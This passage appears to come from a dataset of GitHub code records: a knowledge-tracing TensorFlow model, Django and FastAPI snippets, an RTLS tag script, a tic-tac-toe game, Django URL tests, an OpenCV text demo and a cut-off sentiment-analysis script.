file_handler = logging.FileHandler(os.path.join(log_dir, \"model.log\"))\n stream_handler.setLevel(logging.INFO)\n file_handler.setLevel(logging.WARNING)\n\n log_format = logging.Formatter(\"%(asctime)s %(name)s %(levelname)s %(message)s\")\n stream_handler.setFormatter(log_format)\n file_handler.setFormatter(log_format)\n\n self._logger.addHandler(stream_handler)\n self._logger.addHandler(file_handler)\n\n\n def _build(self):\n \"\"\" Build cell \"\"\"\n skill_nb = self._skill_nb\n transit_initializer = get_param_initializer(self._transit_init)\n guess_initializer = get_param_initializer(self._guess_init)\n slip_initializer = get_param_initializer(self._slip_init)\n\n if self._train_corr:\n self._cell = 
Corr_KTRNNCell(skill_nb=skill_nb,\n transit_initializer=transit_initializer,\n guess_initializer=guess_initializer,\n slip_initializer=slip_initializer,\n guess_max=tf.constant(self._max_guess, dtype=tf.float32),\n slip_max=tf.constant(self._max_slip, dtype=tf.float32),\n corr_matrix=self._corr_matrix)\n else:\n self._cell = KTRNNCell(skill_nb=skill_nb,\n transit_initializer=transit_initializer,\n guess_initializer=guess_initializer,\n slip_initializer=slip_initializer,\n guess_max=tf.constant(self._max_guess, dtype=tf.float32),\n slip_max=tf.constant(self._max_slip, dtype=tf.float32))\n\n\n with tf.name_scope(\"Initialize_learned_prob\"):\n if self._learned_init:\n self._init_state = tf.constant(self._learned_init, shape=[1, skill_nb], dtype=tf.float32)\n else:\n self._init_state = tf.random_uniform(shape=[1, skill_nb], maxval=1.0, minval=0.0,\n dtype=tf.float32)\n\n self._built = True\n\n def _predict_prob(self, inputs, sequence_length):\n \"\"\"\n Predict probability\n :param inputs: Nested tuple (student_id, skills, observation) with shape [batch_size * sequence_length * n]\n :return: predicted observations with shape [batch_size * sequence_length * 1]\n \"\"\"\n\n if not self._built:\n self._build()\n\n with tf.name_scope(\"predict_prob\"):\n batch_size = inputs[0].shape[0]\n init_state = tf.tile(self._init_state, [batch_size, 1], name=\"Initialize_state\")\n output, _ = tf.nn.dynamic_rnn(cell=self._cell, inputs=inputs, initial_state=init_state,\n dtype=tf.float32, sequence_length=sequence_length)\n return output\n\n def _losses(self, labels, predictions, seq_length):\n # Log loss\n seq_length_local = tf.cast(seq_length, dtype=tf.float32)\n labels_local = tf.cast(labels, dtype=tf.float32)\n pred_local = tf.cast(predictions, dtype=tf.float32)\n total_cnt = tf.reduce_sum(seq_length_local)\n\n losses = tf.losses.log_loss(labels=labels_local, predictions=pred_local, reduction=tf.losses.Reduction.NONE)\n return tf.reduce_sum(losses)/total_cnt\n\n def train(self, inputs, labels, iter_num, global_step=None, **kwargs):\n\n with tf.name_scope(\"train\"):\n train_X = inputs[:3]\n train_seq_length = inputs[3]\n predictions = self._predict_prob(train_X, train_seq_length)\n loss = self._losses(labels, predictions, train_seq_length)\n\n optimizer = tf.train.AdamOptimizer(**kwargs)\n train_op = optimizer.minimize(loss, global_step=global_step)\n correct_cnt_op, total_cnt_op = get_correct_and_total(labels, predictions, train_seq_length)\n\n rmse = get_metrics(labels, predictions, train_seq_length, tf.metrics.root_mean_squared_error)\n auc = get_metrics(labels, predictions, train_seq_length, tf.metrics.auc)\n\n tf.summary.scalar(\"losses\", loss)\n tf.summary.scalar(\"metrics/train_acc\", correct_cnt_op/total_cnt_op)\n tf.summary.scalar(\"metrics/rmse\", rmse)\n tf.summary.scalar(\"metrics/auc\", auc)\n tf.summary.histogram(\"pg\", self._max_guess * tf.sigmoid(self._cell._guess_weights))\n tf.summary.histogram(\"pt\", tf.sigmoid(self._cell._transit_weights))\n tf.summary.histogram(\"ps\", self._max_slip * tf.sigmoid(self._cell._slip_weights))\n merged_summaries = tf.summary.merge_all()\n\n sub_fold = \"corr_model\" if self._train_corr else \"standard_model\"\n\n writer = tf.summary.FileWriter(os.path.join(\"tensorboard/\", sub_fold), self._sess.graph)\n self._sess.run(tf.global_variables_initializer())\n self._sess.run(tf.local_variables_initializer())\n\n try:\n for i in range(iter_num):\n gs = self._sess.run(tf.train.get_global_step())\n _, summaries = self._sess.run([train_op, 
merged_summaries])\n\n losses, correct_cnt, total_cnt = self._sess.run([loss, correct_cnt_op, total_cnt_op])\n self._logger.info(\"Step: %d Train loss: %.4f; Train correct: %d; Train total: %d; Train acc: %.4f\"\n % (gs, losses, correct_cnt, total_cnt, correct_cnt/total_cnt))\n\n writer.add_summary(summaries, global_step=gs)\n\n except tf.errors.OutOfRangeError:\n self._logger.warning(\"Run out of training data, stop!\")\n pass\n\n writer.close()\n\n def predict(self, inputs, report_per_loop=5):\n predictions = []\n loop_cnt = 0\n start_time = datetime.now()\n while True:\n try:\n X = inputs[:3]\n seq_length = inputs[3]\n predictions.extend(self._sess.run(self._predict_prob(X, seq_length)))\n\n if loop_cnt % report_per_loop == 0:\n time_delta = (datetime.now() - start_time).seconds\n eff = time_delta / report_per_loop\n\n self._logger.info(\"Finished predict %d students, average speed: %.2fs/student\" % (loop_cnt, eff))\n start_time = datetime.now()\n loop_cnt += 1\n\n except tf.errors.OutOfRangeError:\n break\n return np.array(predictions)\n\n def get_slip_parameters(self):\n return self._sess.run(self._cell.p_slip)\n\n def get_guess_parameters(self):\n return self._sess.run(self._cell.p_guess)\n\n def get_transit_parameters(self):\n return self._sess.run(self._cell.p_trasit)\n\n def get_corr_matrix(self):\n return self._sess.run(self._cell.corr_matrix) if self._train_corr else None\n\n\ndef get_param_initializer(init_value):\n \"\"\" Helper function to build parameter initializer for BKT parameters\"\"\"\n if init_value:\n return tf.constant_initializer(logit_fn(init_value), dtype=tf.float32)\n else:\n return tf.truncated_normal_initializer(dtype=tf.float32)\n\n\ndef get_correct_and_total(labels: tf.Tensor,\n pred_prob: tf.Tensor,\n seq_length: tf.Tensor):\n \"\"\"\n Count correct predictions and total predictions\n :param labels: Ground true label\n :param pred_prob: predictions\n :param seq_length: sequence length\n :return correct, total:\n \"\"\"\n labels_local = tf.cast(labels, tf.float32)\n pred_prob_local = tf.cast(pred_prob, tf.float32)\n seq_length_local = tf.cast(seq_length, tf.float32)\n pred_prob_local = tf.round(pred_prob_local)\n correct_cnt_raw = tf.reduce_sum(tf.cast(tf.equal(labels_local, pred_prob_local), tf.float32))\n\n total_cnt = tf.reduce_sum(seq_length_local)\n dim_sum = tf.cast(tf.shape(labels)[0]*tf.shape(labels)[1], tf.float32)\n padding_cnt = dim_sum - total_cnt\n\n correct_cnt = correct_cnt_raw - padding_cnt\n\n return correct_cnt, total_cnt\n\n\ndef get_accuracy(labels, predictions, seq_length):\n \"\"\"\n Compute predict accuracy\n :param labels: True labels\n :param predictions: predictions\n :param seq_length:\n :return acc, correct, total:\n \"\"\"\n assert labels.shape == predictions.shape\n pred_bin = np.round(predictions)\n correct = np.sum(labels == pred_bin)\n\n size = labels.shape[0]*labels.shape[1]\n total = np.sum(seq_length)\n padding_size = size - total\n\n correct = correct - padding_size\n acc = correct/total\n\n return acc, correct, total\n\n\ndef flatten_with_seq_length(tensor, seq_length):\n \"\"\"\n Flatten the tensor by taking seq_length[i] elements for ith row\n :param tensor: tensor in shape [batch_size, max_seq_length]\n :param seq_length: the valid length for each row\n :return: tensor in shape [sum(seq_length), ]\n \"\"\"\n N = tf.shape(tensor)[0]\n tensor_2d = tf.reshape(tensor, shape=(N, -1))\n seq_length_local = tf.cast(seq_length, tf.int32)\n index = tf.constant(0, dtype=tf.int32)\n\n cond = lambda i, p: tf.less(i, N)\n body = 
lambda i, p: (i + 1, tf.concat([p, tensor_2d[i][:seq_length_local[i]]], axis=0))\n var = (index, tf.zeros(shape=(0,), dtype=tensor_2d.dtype))\n\n res = tf.while_loop(cond, body, var, shape_invariants=(index.get_shape(), tf.TensorShape([None])))\n return res[1]\n\n\ndef get_metrics(labels, predictions, seq_length, metircs_fn):\n \"\"\"\n Return ops to compute rmse\n :param labels: Ground true labels\n :param predictions: Prediction probabilities\n :param seq_length: valid sequence length\n :param metircs_fn: tf.metrics function\n :return: ops\n \"\"\"\n labels_flat = flatten_with_seq_length(labels, seq_length)\n predictions_flat = flatten_with_seq_length(predictions, seq_length)\n\n return metircs_fn(labels_flat, predictions_flat)[1]\n\n\ndef flatten_with_seq_length_num(arr: np.ndarray,\n seq_length: np.ndarray):\n \"\"\"\n Flatten ndarray\n :param arr: ndarray\n :param seq_length: valid length\n :return: ndarray in shape [sum(seq_length)]\n \"\"\"\n N = arr.shape[0]\n arr_2d = arr.reshape((N, -1))\n seq_length_local = seq_length.astype(np.int32)\n index = 0\n\n res = np.empty(shape=(np.sum(seq_length_local)))\n for i in range(N):\n res[index:index+seq_length_local[i]] = arr_2d[i][:seq_length_local[i]]\n index += seq_length_local[i]\n\n assert index == np.sum(seq_length_local), \"index does not reach the end\"\n return res\n\n\ndef get_metrics_num(labels, predictions, seq_length, metrics_fn):\n \"\"\"\n Compute metrics from numpy arrays\n :param labels: ndarray\n :param predictions: ndarray\n :param seq_length: ndarray\n :param metrics_fn: sklearn.metrics\n :return:\n \"\"\"\n labels_flat = flatten_with_seq_length_num(labels, seq_length)\n predictions_flat = flatten_with_seq_length_num(predictions, seq_length)\n\n return metrics_fn(labels_flat, predictions_flat)\n","repo_name":"qianlin404/correlation_BKT","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":21648,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"21635899973","text":"# -*- coding: utf-8 -*-\n__author__ = 'HymanLu'\n\nfrom django.db.models.signals import post_save, post_delete\nfrom django.dispatch import receiver\nfrom rest_framework.authtoken.models import Token\nfrom django.contrib.auth import get_user_model\n\n\nfrom user_operation.models import UserFav\n\n\n@receiver(post_save, sender=UserFav)\ndef create_userfav(sender, instance=None, created=False, **kwargs):\n if created:\n goods = instance.goods\n goods.fav_num += 1\n goods.save()\n\n\n@receiver(post_delete, sender=UserFav)\ndef delete_userfav(sender, instance=None, created=False, **kwargs):\n goods = instance.goods\n goods.fav_num -= 1\n goods.save()\n","repo_name":"gh877916059/drf-Vue-website","sub_path":"back-end-src/apps/user_operation/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"53"} +{"seq_id":"19066258644","text":"import logging.config\n\nimport uvicorn\n\nfrom fastapi_auth_service.api.http import app\nfrom fastapi_auth_service.conf import settings\n\n\nLOGGING_CONFIG = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'default': {\n '()': 'python3_commons.logging.formatter.JSONFormatter',\n },\n },\n 'filters': {\n 'info_and_below': {\n '()': 'python3_commons.logging.filters.filter_maker',\n 'level': 'INFO'\n }\n },\n 'handlers': {\n 'default_stdout': {\n 'level': settings.logging_level,\n 'class': 
'logging.StreamHandler',\n 'stream': 'ext://sys.stdout',\n 'formatter': 'default',\n 'filters': ['info_and_below', ],\n },\n 'default_stderr': {\n 'level': 'WARNING',\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://sys.stderr',\n 'formatter': 'default',\n },\n },\n 'loggers': {\n '': {\n 'handlers': ['default_stderr', 'default_stdout', ],\n },\n 'fastapi_auth_service': {\n 'handlers': ['default_stderr', 'default_stdout', ],\n 'level': settings.logging_level,\n 'propagate': False,\n },\n '__main__': {\n 'handlers': ['default_stderr', 'default_stdout', ],\n 'level': settings.logging_level,\n 'propagate': False,\n }\n }\n}\nlogging.config.dictConfig(LOGGING_CONFIG)\n\nuvicorn.run(app, host=settings.service_addr, port=settings.service_port, proxy_headers=True, log_config=LOGGING_CONFIG)\n","repo_name":"kamikaze/fastapi-auth-service","sub_path":"src/fastapi_auth_service/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"30146984610","text":"# tagFunc\n\"\"\"This function determines the tag position matrix\"\"\"\n\nimport socket\nimport numpy as np\nimport sys\nimport re\nimport json\nimport time\nfrom json import JSONDecoder\n\n\n########################################################################################\ndef find(s, ch):\n \"\"\"This function returns all instances of the substring in a given input string\"\"\"\n return [i for i, ltr in enumerate(s) if ltr == ch]\n########################################################################################\n\n\n# OpenRTLS API commands\nlistTags = '{\\\"command\\\":\\\"listTags\\\"}'\n\n\ndef tagFunc(buffSize, tagMat, tagNames, ancNames, ancNum, TCP_IP, TCP_PORT, UDP_IP, UDP_PORT):\n\n\n # Define and initialize a tag counter\n tagNum = 0\n\n # Open the socket and request a tag list\n tcpSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcpSock.connect((TCP_IP, TCP_PORT))\n tcpSock.send(listTags.encode())\n print('\\nRequesting tag list from master')\n time.sleep(0.5)\n data = tcpSock.recv(1024).decode(\"utf-8\")\n\n\n # Now pull out the tag names\n doc = json.loads(data) \n for tag in doc['tags']:\n\n # Current tag name\n tagNames.append(tag['id'])\n tagNum += 1\n\n\n # Tell the user which tags have been found\n print('\\nThe following tags were found')\n print('\\n')\n print(tagNames)\n \n\n # Check if there's more than one tag and ask which to use \n if tagNum != 1:\n useTag = input('\\nPlease enter the tag ID which you want to use to define the field: ')\n \n # Check if useTag is in the list of tags\n while useTag not in tagNames:\n print('\\nYou have entered a tag not in the list\\n')\n useTag = input('\\nPlease enter the tag ID which you want to use to define the field: ')\n print('\\nWe will now take three measurements using tag ',useTag)\n elif tagNum == 1:\n useTag = tagNames[0]\n\n # Gracefully close the TCP socket\n tcpSock.close()\n\n # Receive data from the UDP stream \n udpSock = socket.socket(socket.AF_INET, # Internet\n socket.SOCK_DGRAM) # UDP\n udpSock.bind((UDP_IP, UDP_PORT))\n\n\n # Now get the tag measurements by opening a UDP socket\n j = 0\n while j <=2:\n\n circBuff = np.zeros((ancNum, buffSize, 3))\n counter = 0\n anchorCnt = np.zeros(ancNum)\n anchorCnt2 = 0\n \n\n if j == 0:\n input(\"\\nPress Enter to continue to take the first measurement...\")\n elif j == 1:\n input(\"\\nPress Enter to continue to take the second measurement...\")\n elif j == 2:\n 
input(\"\\nPress Enter to continue to take the third measurement...\")\n\n # Initialize a useful counter which will count the number of outstanding measurements\n waitingFor = buffSize\n\n while any (circBuff[:, buffSize-1, j] == 0):\n \n #Receive data from the UDP stream\n data, addr = udpSock.recvfrom(4096) # buffer size is 1600 bytes \n \n try:\n data = data.decode(\"utf-8\").split()[0] \n except:\n print(data)\n sys.exit()\n \n doc = json.loads(data)\n\n\n # Check if we have Tag-Anchor Communications\n if ('mode' not in doc) and (doc['id'] == useTag):\n for meas in doc['meas']:\n if 'dist' in meas:\n \n # This is the current anchor\n currentAnc = meas['anchor']\n anchorPos = ancNames.index(currentAnc)\n circBuffPos = int(np.mod(anchorCnt[anchorPos], buffSize))\n circBuff[anchorPos, circBuffPos, j] = meas['dist']\n anchorCnt[anchorPos] += 1\n waitingFor = np.max(np.count_nonzero(circBuff[anchorPos, circBuffPos, j], axis=0))\n print('\\nWaiting for ' + str(waitingFor) + ' additional measurements')\n print(circBuff[:, :, j])\n print('\\n')\n print('\\nMeasurements have been recorded') \n tagMat[j, :] = np.mean(circBuff[:, :, j].T, axis=0)\n print('\\n')\n print(tagMat)\n\n throwAway = input(\"\\nTHROW AWAY DATA? Y/N\").lower()\n if throwAway == 'n':\n j+=1\n\n \n\n \n\n return tagMat, tagNames, tagNum\n","repo_name":"nsotiriou88/Python","sub_path":"Projects/autoSetup/tagFunc/tagFunc.py","file_name":"tagFunc.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39243394457","text":"__author__ = 'derog'\n\nimport fileinput\n\n\nclass Board():\n def __init__(self):\n # 0 empty, 1 first player, -1 second player\n self._board_values = [[0 for j in range(3)] for i in range(3)]\n self._is_game_not_ended = True\n self._number_of_moves = 0\n self.winner = 0\n\n def __str__(self):\n return str(self._board_values)\n\n def value(self, xposition, yposition):\n return self._board_values[xposition][yposition]\n\n def values(self):\n return self._board_values\n\n def load(self, values):\n self._board_values = values\n #We need to check that the loading is valid and also count the number of of moves\n remaining_moves=9\n for j in range(3):\n for i in range(3):\n if self.value(i, j) == 0:\n remaining_moves-=1\n self._number_of_moves=remaining_moves\n\n def is_game_notended(self):\n return self._is_game_not_ended\n\n def move(self, xposition, yposition, value):\n if xposition is None or yposition is None:\n raise ValueError(\"Didnt receive a valid position\")\n\n if self._board_values[xposition][yposition] == 0:\n self._board_values[xposition][yposition] = value\n self._number_of_moves += 1\n else:\n raise IndexError(\"Tryng to insert in an occupied position\")\n\n # First check if there are avaible slots to play in, since we have the number of moves this is easy\n if self.number_of_moves() == 9:\n self._is_game_not_ended = False\n #We need an extra check for this one\n\n # Now we will check if someone wins the game; we will search only for the player playing\n def win_check(position, value, vector=(0, 0)):\n # Check if the position is valid\n x = position[0]\n y = position[1]\n if x < 0 or y < 0 or x > 2 or y > 2:\n return 0\n else:\n if vector == (0, 0):\n #First time execution\n if self._board_values[x][y] == value:\n max_value = 0\n vector_list = [(1, 0), (0, 1), (1, 1), (1, -1)]\n for element in vector_list:\n #Reevaluates with all the displacements\n temp = 0\n temp = win_check((x + element[0], y + 
element[1]), value, element)\n                            temp += win_check((x - element[0], y - element[1]), value, (-element[0], -element[1]))\n                            if temp > max_value:\n                                max_value = temp\n                        return 1 + max_value\n                    else:\n                        raise ValueError(\"Function should be used if the first position/value is wrong\")\n                else:\n                    #Recursive values\n                    if self._board_values[x][y] == value:\n                        return 1 + win_check((x + vector[0], y + vector[1]), value, vector)\n                    else:\n                        return 0\n\n        if win_check((xposition, yposition), value) > 2:\n            self._is_game_not_ended = False\n            self.winner = value\n\n\n    def number_of_moves(self):\n        return self._number_of_moves\n\n    def __call__(self, *args, **kwargs):\n        self.move(args[0][0], args[0][1], args[1])\n\n    def plot(self):\n        text = '#=#=#=#'\n\n        for i in range(3):\n            text += '\\n'\n            text += '|'\n            for j in range(3):\n                if self._board_values[i][j] == 0:\n                    text += ' '\n                elif self._board_values[i][j] == 1:\n                    text += 'X'\n                elif self._board_values[i][j] == -1:\n                    text += 'O'\n            text += '|'\n        text += '\\n#=#=#=#'\n\n        print(text)\n\n    def getBoardValues(self):\n        return self._board_values\n\n    def __bool__(self):\n        return self.is_game_notended()\n\n    def __len__(self):\n        return self._number_of_moves\n\n    def who_wins(self):\n        return self.winner\n\n\nclass Player():\n    def __init__(self, name=\"\", brain=None, human=False):\n        self.name = name\n        self._is_human = human\n        self.comp_time = []\n        if name == \"\" and brain != None:\n            self.name = str(brain)\n        if brain is not None:\n            self.brain = brain\n\n    def is_human(self):\n        return self._is_human\n\n    def has_brain(self):\n        if self.is_human():\n            print(\"Humans don't need brains\")\n            return False\n        else:\n            if self.brain is not None:\n                return True\n            else:\n                return False\n\n    def getName(self):\n        return self.name\n\n    def get_average_time(self):\n        return sum(self.comp_time) / len(self.comp_time)\n\n    def move(self, board, lastmove, player):\n        import time\n\n        start = time.perf_counter()\n        if self.is_human():\n            move = []\n            move.append(int(input()))\n            move.append(int(input()))\n            self.comp_time.append((time.perf_counter() - start))\n            return move\n        else:\n            if self.has_brain():\n                play = self.brain(board, lastmove, player)\n                self.comp_time.append((time.perf_counter() - start))\n                return play\n            else:\n                print(\"If the player is not a human a brain needs to be loaded\")\n                return None\n\n    def LoadBrain(self, brain):\n        self.brain = brain\n\n    def __str__(self):\n        return self.getName()\n\n\nclass Game():\n    def __init__(self, player1, player2, turn=1):\n        self.board = Board()\n        self.player1 = player1\n        self.player2 = player2\n        self.turn = turn\n        self._winner = 0\n        self.lastmove = (None, None)\n\n    def move(self):\n        if self.turn == 1:\n            self.lastmove = self.player1.move(self.board.getBoardValues(), self.lastmove, self.turn)\n        else:\n            self.lastmove = self.player2.move(self.board.getBoardValues(), self.lastmove, self.turn)\n\n        self.board.move(self.lastmove[0], self.lastmove[1], self.turn)\n        self.turn *= -1\n\n        if not self.board.is_game_notended():\n            self._winner = self.board.who_wins()\n\n\n    def __bool__(self):\n        return self.is_game_notended()\n\n    def plot(self):\n        print('Player1[X] is ' + self.player1.getName())\n        print('Player2[O] is ' + self.player2.getName())\n        self.board.plot()\n\n    def __iter__(self):\n        self.move()\n\n    def is_game_notended(self):\n        return self.board.is_game_notended()\n\n    def number_of_moves(self):\n        return self.board.number_of_moves()\n\n    def __len__(self):\n        return self.number_of_moves()\n\n    def winner(self):\n        if self.is_game_notended():\n            return \"No one won yet\"\n        else:\n
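            # self._winner holds +1 for player1, -1 for player2 and 0 for a draw\n            if self._winner == 1:\n                return 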
self.player1.getName()\n elif self._winner == 0:\n return \"Draw\"\n else:\n return self.player2.getName()\n\n def who_plays(self):\n if self.turn == 1:\n return self.player1.getName()\n else:\n return self.player2.getName()\n\n #TODO ","repo_name":"FermiBarlam/TicTacToeAI","sub_path":"TicTacToeGame.py","file_name":"TicTacToeGame.py","file_ext":"py","file_size_in_byte":7355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26528832384","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom copy import copy\n\nfrom django.conf.urls import include, url\nfrom django_js_reverse.tests.helper import is_django_ver_gte_2\nfrom django_js_reverse.views import urls_js\n\ntry:\n from django.urls import path\nexcept ImportError:\n pass\n\nif sys.version < '3':\n import codecs\n\n def u(x):\n return codecs.unicode_escape_decode(x)[0]\nelse:\n def u(x):\n return x\n\n\ndef dummy_view(*args, **kwargs):\n pass\n\n\napp_name = 'django_js_reverse'\n\nbasic_patterns = [\n url(r'^jsreverse/$', urls_js, name='js_reverse'),\n\n # test urls\n url(r'^test_no_url_args/$', dummy_view, name='test_no_url_args'),\n url(r'^test_one_url_args/(?P[-\\w]+)/$', dummy_view, name='test_one_url_args'),\n url(r'^test_two_url_args/(?P[-\\w]+)-(?P[-\\w]+)/$', dummy_view, name='test_two_url_args'),\n url(r'^test_optional_url_arg/(?:1_(?P[-\\w]+)-)?2_(?P[-\\w]+)/$', dummy_view,\n name='test_optional_url_arg'),\n url(r'^test_unicode_url_name/$', dummy_view, name=u('test_unicode_url_name')),\n url(r'^test_duplicate_name/(?P[-\\w]+)/$', dummy_view, name='test_duplicate_name'),\n url(r'^test_duplicate_name/(?P[-\\w]+)-(?P[-\\w]+)/$', dummy_view, name='test_duplicate_name'),\n url(r'^test_duplicate_argcount/(?P[-\\w]+)?-(?P[-\\w]+)?/$', dummy_view,\n name='test_duplicate_argcount'),\n]\n\nif is_django_ver_gte_2():\n basic_patterns.append(\n path('test_django_gte_2_path_syntax///', dummy_view,\n name='test_django_gte_2_path_syntax'),\n )\n\nurlpatterns = copy(basic_patterns)\n\n# test exclude namespaces urls\nurlexclude = [\n url(r'^test_exclude_namespace/$', dummy_view,\n name='test_exclude_namespace_url1')\n]\n\n# test namespace\npattern_ns_1 = [\n url(r'', include(basic_patterns))\n]\n\npattern_ns_2 = [\n url(r'', include(basic_patterns))\n]\n\npattern_ns_arg = [\n url(r'', include(basic_patterns))\n]\n\nif is_django_ver_gte_2():\n urlexclude = (urlexclude, 'django_js_reverse')\n pattern_ns_1_arg = (pattern_ns_1, 'django_js_reverse')\n pattern_ns_2_arg = (pattern_ns_2, 'django_js_reverse')\n pattern_ns_arg_arg = (pattern_ns_arg, 'django_js_reverse')\nelse:\n urlexclude = urlexclude\n pattern_ns_1_arg = pattern_ns_1\n pattern_ns_2_arg = pattern_ns_2\n pattern_ns_arg_arg = pattern_ns_arg\n\npattern_nested_ns = [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1'))\n]\n\npattern_dubble_nested2_ns = [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1'))]\n\nif is_django_ver_gte_2():\n pattern_nested_ns_arg = (pattern_nested_ns, 'django_js_reverse')\n pattern_dubble_nested2_ns_arg = (pattern_dubble_nested2_ns, 'django_js_reverse')\nelse:\n pattern_nested_ns_arg = pattern_nested_ns\n pattern_dubble_nested2_ns_arg = pattern_dubble_nested2_ns\n\npattern_dubble_nested_ns = [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1')),\n url(r'^nsdn2/', include(pattern_dubble_nested2_ns_arg, namespace='nsdn2'))]\n\nif is_django_ver_gte_2():\n pattern_dubble_nested_ns_arg = (pattern_dubble_nested_ns, 'django_js_reverse')\nelse:\n pattern_dubble_nested_ns_arg = 
pattern_dubble_nested_ns\n\npattern_only_nested_ns = [\n url(r'^ns1/', include(pattern_ns_1)),\n url(r'^nsdn0/', include(pattern_dubble_nested2_ns_arg, namespace='nsdn0'))]\n\nif is_django_ver_gte_2():\n pattern_only_nested_ns_arg = (pattern_only_nested_ns, 'django_js_reverse')\nelse:\n pattern_only_nested_ns_arg = pattern_only_nested_ns\n\nurlpatterns += [\n url(r'^ns1/', include(pattern_ns_1_arg, namespace='ns1')),\n url(r'^ns2/', include(pattern_ns_2_arg, namespace='ns2')),\n url(r'^ns_ex/', include(urlexclude, namespace='exclude_namespace')),\n url(r'^ns(?P[^/]*)/', include(pattern_ns_arg_arg, namespace='ns_arg')),\n url(r'^nestedns/', include(pattern_nested_ns_arg, namespace='nestedns')),\n url(r'^nsdn/', include(pattern_dubble_nested_ns_arg, namespace='nsdn')),\n url(r'^nsno/', include(pattern_only_nested_ns_arg, namespace='nsno'))\n]\n","repo_name":"pnija/debian-installer","sub_path":"debian/kolibri/usr/lib/python3/dist-packages/kolibri/dist/django_js_reverse/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73720833767","text":"from lino.utils import isidentifier\n\nfrom lino.api import dd, _, pgettext\n\n\nclass MessageType(dd.Choice):\n #required_roles = set({})\n\n def __init__(self, value, text, **kwargs):\n if not isidentifier(value):\n raise Exception(\"{} not a valid identifier\".format(value))\n super(MessageType, self).__init__(value, text, value, **kwargs)\n\n # def add_requirements(self, *args):\n # \"\"\"\n # Add the specified user roles as requirements to this message type.\n # \"\"\"\n # self.required_roles |= set(args)\n\nclass MessageTypes(dd.ChoiceList):\n verbose_name = _(\"Message Type\")\n verbose_name_plural = _(\"Message Types\")\n item_class = MessageType\n\n # @classmethod\n # def register_type(cls, name, *args, **kwargs):\n # cls.add_item_lazy(name, *args, **kwargs)\n\n\nadd = MessageTypes.add_item\nadd('system', _(\"System event\"))\nadd('change', pgettext(\"message type\", \"Change\"))\n# add('300', _(\"Action\"), 'action')\n# add('300', _(\"Warning\"), 'warning')\n# add('400', _(\"Note\"), 'note')\n# add('900', _(\"Notification\"), 'notification')\n\n\n\nclass MailModes(dd.ChoiceList):\n verbose_name = _(\"Notification mode\")\n verbose_name_plural = _(\"Notification modes\")\n\nadd = MailModes.add_item\nadd('silent', _(\"Silent\"), 'silent')\nadd('never', _(\"No mails\"), 'never')\n# add('immediately', _(\"Immediately\"), 'immediately') # obsolete\nadd('often', _(\"Mail often\"), 'often')\nadd('daily', _(\"Daily email digest\"), 'daily')\nadd('weekly', _(\"Weekly email digest\"), 'weekly') # not yet implemented\n","repo_name":"lino-framework/lino","sub_path":"lino/modlib/notify/choicelists.py","file_name":"choicelists.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"71315501928","text":"import cv2 as cv\n\n# in this program we are writting some text on image.\n# putText(1st_arg, 2nd_arg, 3rd_arg, 4th_arg, 5th_arg, 6th_arg, 7th_arg) method is used to put text on image \n# 1st_arg: it displays the output image after putting text.\n# 2nd_arg: text that you want to put on image.\n# 3rd_arg: position where on image you want to put that text.\n# 4th_arg: what font style you want to put.\n# 5th_arg: size of the font.\n# 6th_arg: color in RGB tuple.\n# 7th_arg: thickness of the font (only integer 
values).\n\nimage = cv.imread(\"lena.jpg\")\n\ntext_image = cv.putText(image, \"Girl\", (0, 50), cv.FONT_HERSHEY_SIMPLEX, 2, (0, 0, 0), 3)\ncv.imshow(\"Texted image\", text_image)\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"Amrat26728/opencv","sub_path":"display-text-on-image.py","file_name":"display-text-on-image.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19945140819","text":"import textblob \nfrom textblob import TextBlob\nfrom article_preprocessing import tokenize_hin, spacy_tokenizer, remove_hin_stopwords\nimport numpy as np\nfrom gensim.models.fasttext import FastText \nfrom model import get_sentiment, get_word_polarity, get_word_polarity_en\nfrom sentiment_config import *\n\nfilepath = HINDI_STOPWORDS\n\n# used to find the location points of aspect term in the review\n# takes tokenized aspect term and article as input \ndef aspect_term_location(aspect_term, article, lang_code):\n location_points = []\n start_point = article.index(aspect_term[0])\n location_points.append(start_point)\n if len(aspect_term) > 1:\n end_point = article.index(aspect_term[len(aspect_term)-1])\n location_points.append(end_point)\n \n return location_points \n\n# Used to find the aspect term sentiment, for a sentence in the review \n# takes the aspect term, sentence and language code as the input\n# pass pos_words and neg_words dictionaty list along with the FastText embeddings model when using Indian languages\n# pass the respective model and word lists for a given language.\n# The aspect term and sentence need to be tokenized \ndef word_distance_based_score(aspect_term, article, lang_code, model=None):\n\taspect_locations = aspect_term_location(aspect_term, article, lang_code)\n\n\tif len(aspect_locations) == 1:\n\t\tstart_point = end_point = aspect_locations[0]\n\telse:\n\t\tstart_point = aspect_locations[0]\n\t\tend_point = aspect_locations[1]\n\n\tprint(start_point)\n\tprint(end_point)\n\n\ttot_polarity_start = 0\n\ttot_polarity_end = 0 \n\n\tfor i in range(start_point):\n\t\tif lang_code == 'en':\n\t\t\tpolarity = get_word_polarity_en(article[i])\n\t\tif lang_code =='hi':\n\t\t\tpolarity = 